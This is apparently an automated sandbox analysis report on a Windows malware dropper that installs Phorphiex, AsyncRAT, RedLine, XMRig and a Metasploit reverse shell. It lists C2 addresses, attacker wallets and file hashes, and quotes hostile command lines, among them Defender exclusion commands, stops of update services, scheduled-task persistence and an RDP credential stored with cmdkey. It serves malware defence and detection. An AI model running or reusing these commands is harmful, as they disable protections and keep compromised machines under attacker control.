Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
  • submitted
    28-10-2024 19:02

General

  • Target

    4363463463464363463463463.exe(3).exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

phorphiex

C2

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3ESHude8zUHksQg1h6hHmzY79BS36L91Yn

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes
  • mutex

    l9ll8dd6x

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

0.tcp.eu.ngrok.io:15174

Mutex

aNoM7pvDUvoo

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

redline

C2

38.180.72.54:42814

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

34.124.148.215:4444

Extracted

Family

redline

Botnet

Miles

C2

194.49.94.43:3251

Attributes
  • auth_value

    e9df05a4c476aa612a10a6f3fc79043d

Extracted

Family

phorphiex

C2

http://185.215.113.84

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Modifies security service 2 TTPs 2 IoCs
  • Phorphiex family
  • Phorphiex payload 4 IoCs
  • Phorphiex, Phorpiex

    Phorphiex (also spelled Phorpiex) is a malware family that infects systems in order to distribute other malicious payloads, such as ransomware, stealers and cryptominers.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • Redline family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Windows security bypass 2 TTPs 12 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 1 IoCs
  • XMRig Miner payload 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths and processes.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 37 IoCs
  • Windows security modification 2 TTPs 14 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 13 IoCs

    Sc.exe is a Windows utility used to control services on the system.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 32 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 18 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 28 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1212
      • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe(3).exe
        "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe(3).exe"
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3060
        • C:\Users\Admin\AppData\Local\Temp\Files\r.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2996
          • C:\Windows\sysvplervcs.exe
            C:\Windows\sysvplervcs.exe
            4⤵
            • Modifies security service
            • Windows security bypass
            • Executes dropped EXE
            • Loads dropped DLL
            • Windows security modification
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2780
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2764
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:804
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2012
              • C:\Windows\SysWOW64\sc.exe
                sc stop UsoSvc
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2572
              • C:\Windows\SysWOW64\sc.exe
                sc stop WaaSMedicSvc
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2188
              • C:\Windows\SysWOW64\sc.exe
                sc stop wuauserv
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2320
              • C:\Windows\SysWOW64\sc.exe
                sc stop DoSvc
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2792
              • C:\Windows\SysWOW64\sc.exe
                sc stop BITS /wait
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2516
            • C:\Users\Admin\AppData\Local\Temp\186279201.exe
              C:\Users\Admin\AppData\Local\Temp\186279201.exe
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2320
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                        6⤵
                        PID:2992
                        • C:\Windows\system32\reg.exe
                          reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                          7⤵
                          PID:1516
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                        6⤵
                        PID:1996
                        • C:\Windows\system32\schtasks.exe
                          schtasks /delete /f /tn "Windows Upgrade Manager"
                          7⤵
                          PID:892
                  • C:\Users\Admin\AppData\Local\Temp\240433249.exe
                    C:\Users\Admin\AppData\Local\Temp\240433249.exe
                    5⤵
                    • Executes dropped EXE
                    PID:808
                  • C:\Users\Admin\AppData\Local\Temp\2476224829.exe
                    C:\Users\Admin\AppData\Local\Temp\2476224829.exe
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1920
                    • C:\Users\Admin\AppData\Local\Temp\2408218232.exe
                      C:\Users\Admin\AppData\Local\Temp\2408218232.exe
                      6⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2444
                  • C:\Users\Admin\AppData\Local\Temp\592416158.exe
                    C:\Users\Admin\AppData\Local\Temp\592416158.exe
                    5⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:1964
          • C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe"
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            PID:2540
          • C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:864
          • C:\Users\Admin\AppData\Local\Temp\Files\new1.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\new1.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            PID:2652
          • C:\Users\Admin\AppData\Local\Temp\Files\ss.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\ss.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1992
          • C:\Users\Admin\AppData\Local\Temp\Files\Miles.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\Miles.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2792
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 512
                4⤵
                • Loads dropped DLL
                • Program crash
                PID:1112
          • C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:2136
              • C:\Windows\sysklnorbcv.exe
                C:\Windows\sysklnorbcv.exe
                4⤵
                • Modifies security service
                • Windows security bypass
                • Executes dropped EXE
                • Loads dropped DLL
                • Windows security modification
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: SetClipboardViewer
                PID:2924
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2624
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2364
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1068
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop UsoSvc
                        6⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:2444
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop WaaSMedicSvc
                        6⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:1668
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop wuauserv
                        6⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:2604
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop DoSvc
                        6⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:2068
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop BITS
                        6⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:1928
                  • C:\Users\Admin\AppData\Local\Temp\278213165.exe
                    C:\Users\Admin\AppData\Local\Temp\278213165.exe
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2400
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                        6⤵
                        PID:952
                        • C:\Windows\system32\reg.exe
                          reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                          7⤵
                          PID:1496
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                        6⤵
                        PID:2368
                        • C:\Windows\system32\schtasks.exe
                          schtasks /delete /f /tn "Windows Upgrade Manager"
                          7⤵
                          PID:2440
                  • C:\Users\Admin\AppData\Local\Temp\85784441.exe
                    C:\Users\Admin\AppData\Local\Temp\85784441.exe
                    5⤵
                    • Executes dropped EXE
                    PID:572
                  • C:\Users\Admin\AppData\Local\Temp\1705128845.exe
                    C:\Users\Admin\AppData\Local\Temp\1705128845.exe
                    5⤵
                    • Executes dropped EXE
                    PID:1764
                  • C:\Users\Admin\AppData\Local\Temp\2284720121.exe
                    C:\Users\Admin\AppData\Local\Temp\2284720121.exe
                    5⤵
                    • Executes dropped EXE
                    PID:1628
          • C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2076
              • C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\networks_profile.exe"
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2868
          • C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:2948
          • C:\Users\Admin\AppData\Local\Temp\Files\11.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\11.exe"
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            PID:2740
              • C:\Windows\sysarddrvs.exe
                C:\Windows\sysarddrvs.exe
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1052
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                    5⤵
                    PID:1928
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:1116
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                    5⤵
                    PID:2068
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop UsoSvc
                        6⤵
                        • Launches sc.exe
                        PID:2600
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop WaaSMedicSvc
                        6⤵
                        • Launches sc.exe
                        PID:2364
                      • C:\Windows\SysWOW64\sc.exe
                        sc stop wuauserv
                        6⤵
                        • Launches sc.exe
                        PID:1516
          • C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2420
          • C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2844
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\30.tmp\31.tmp\32.bat C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe"
                4⤵
                PID:1664
                  • C:\Windows\system32\cmdkey.exe
                    cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"
                    5⤵
                    PID:3016
                  • C:\Windows\system32\mstsc.exe
                    mstsc /v: 211.168.94.177
                    5⤵
                    • Enumerates connected drives
                    • Suspicious behavior: AddClipboardFormatListener
                    • Suspicious use of SetWindowsHookEx
                    PID:2092
          • C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
            3⤵
            • Executes dropped EXE
            PID:1716
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2408
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2428
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
        2⤵
        PID:788
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1940
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2676
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe
        2⤵
        PID:1016
      • C:\Windows\System32\dwm.exe
        C:\Windows\System32\dwm.exe
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2044
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {787600AD-1482-4775-AF44-C44AFE3021E3} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
    1⤵
    • Loads dropped DLL
    PID:544
      • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
        "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        PID:2772

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    21ea69d7ca5912646ddb009d6c8925a2

    SHA1

    3bed96fbc8d44da403238f346bd21dc7c8af7f75

    SHA256

    5e011202bb6eb9053d7447dbf640b90b0406a572ac4c70164ea486f9c7bdd0c0

    SHA512

    85ad7d25a96573ec8bef2033659b97e7c179084b8a97f739bb49a311ae3e64da8680fed91724fe72c806d554f216547a7129bf98eb002ea0ea1f8a91c6dc6eeb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2d94b4cfb04834f6d17eb600df27883f

    SHA1

    a2b6b86ad772dda2d5b1ef1dcfc5910a3269bb29

    SHA256

    18f1811899f9765c6cf02a24ef7afc91e235fce40f2b612c0d9558b03bbdf7e5

    SHA512

    77256ac500663557a0eb723d2d36ae91c63a179001f42b20e0d646e39bd83f66dd797cc1f2f1da77022364a90bf82c85438af7bc7a38a02584cbcb871f875d36

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    03a8364d6d40eb5fe248179e51a65605

    SHA1

    85ba26f725dc80d91cc4d36dfd2327abbdbc107e

    SHA256

    4ab0329b28ae0a6312fc2dd6efb646151d28c7ea861fb8d2d3d5a1194afef60f

    SHA512

    8bae65057fabd5034387c696294d00f498b4c92ff229ccbeeeb16e3f5460fb4ac68e22e2594c1dccf0efa6e21afbd7db942ad6777318bfadecf8513fc4952b15

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6G4X5UFP\1[1]

    Filesize

    108KB

    MD5

    1fcb78fb6cf9720e9d9494c42142d885

    SHA1

    fef9c2e728ab9d56ce9ed28934b3182b6f1d5379

    SHA256

    84652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02

    SHA512

    cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3

  • C:\Users\Admin\AppData\Local\Temp\CabCBD9.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

                                  SHA1

                                  1723be06719828dda65ad804298d0431f6aff976

                                  SHA256

                                  b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                  SHA512

                                  bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                • C:\Users\Admin\AppData\Local\Temp\Files\11.exe

                                  Filesize

                                  79KB

                                  MD5

                                  e2e3268f813a0c5128ff8347cbaa58c8

                                  SHA1

                                  4952cbfbdec300c048808d79ee431972b8a7ba84

                                  SHA256

                                  d8b83f78ed905a7948e2e1e371f0f905bcaaabbb314c692fee408a454f8338a3

                                  SHA512

                                  cb5aeda8378a9a5470f33f2b70c22e77d2df97b162ba953eb16da085b3c434be31a5997eac11501db0cb612cdb30fa9045719fcd10c7227c56cc782558e0c3bc

                                • C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe

                                  Filesize

                                  114KB

                                  MD5

                                  a474faa2f1046fbab4c3ad1e3a26097e

                                  SHA1

                                  aa526b2583dd9b72dd4ae2549189c6631f8486c2

                                  SHA256

                                  391233a33e1e163875616a8c1564ec8597b630ffcbb4b123c5cfb5b5d3eeea8b

                                  SHA512

                                  947f248d1e7c7c897a9b508607611bb69fa3a9ac1d8b5a0e0343e955a7d6dd235408d086bdf2ec4e9f15e30c1f082b9980144f6de7eebf95e71719c5e1e7040b

                                • C:\Users\Admin\AppData\Local\Temp\Files\r.exe

                                  Filesize

                                  96KB

                                  MD5

                                  930c41bc0c20865af61a95bcf0c3b289

                                  SHA1

                                  cecf37c3b6c76d9a79dd2a97cfc518621a6ac924

                                  SHA256

                                  1f2e9724dfb091059ae16c305601e21d64b5308df76ddef6b394573e576ef1ff

                                  SHA512

                                  fa1f33c71da608b3980038981220fcebee0b0cc44331e52f5198dd2761c97631ee8286756c2cc16245a1370c83bb53cc8ea8ef64e0fcdd30af51f023973986b2

                                • C:\Users\Admin\AppData\Local\Temp\Files\t1.exe

                                  Filesize

                                  84KB

                                  MD5

                                  a775d164cf76e9a9ff6afd7eb1e3ab2e

                                  SHA1

                                  0b390cd5a44a64296b592360b6b74ac66fb26026

                                  SHA256

                                  794ba0b949b2144057a1b68752d8fa324f1a211afc2231328be82d17f9308979

                                  SHA512

                                  80b2d105d2fac2e56b7ea9e1b56057e94ffe594c314ea96668d387ab120b24be580c58d68d37aca07273d3ce80f0d74f072102469f35cb02e2295817e1f16808

                                • C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe

                                  Filesize

                                  83KB

                                  MD5

                                  06560b5e92d704395bc6dae58bc7e794

                                  SHA1

                                  fbd3e4ae28620197d1f02bfc24adaf4ddacd2372

                                  SHA256

                                  9eaaadf3857e4a3e83f4f78d96ab185213b6528c8e470807f9d16035daadf33d

                                  SHA512

                                  b55b49fc1bd526c47d88fcf8a20fcaed900bfb291f2e3e1186ec196a87127ed24df71385ae04fedcc802c362c4ebf38edfc182013febf4496ddeb66ce5195ee3

                                • C:\Users\Admin\AppData\Local\Temp\TarCBEC.tmp

                                  Filesize

                                  181KB

                                  MD5

                                  4ea6026cf93ec6338144661bf1202cd1

                                  SHA1

                                  a1dec9044f750ad887935a01430bf49322fbdcb7

                                  SHA256

                                  8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                  SHA512

                                  6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                • C:\Users\Admin\AppData\Local\Temp\Tmp3248.tmp

                                  Filesize

                                  2KB

                                  MD5

                                  1420d30f964eac2c85b2ccfe968eebce

                                  SHA1

                                  bdf9a6876578a3e38079c4f8cf5d6c79687ad750

                                  SHA256

                                  f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

                                  SHA512

                                  6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

                                • C:\Users\Admin\AppData\Local\Temp\_MEI20762\python39.dll

                                  Filesize

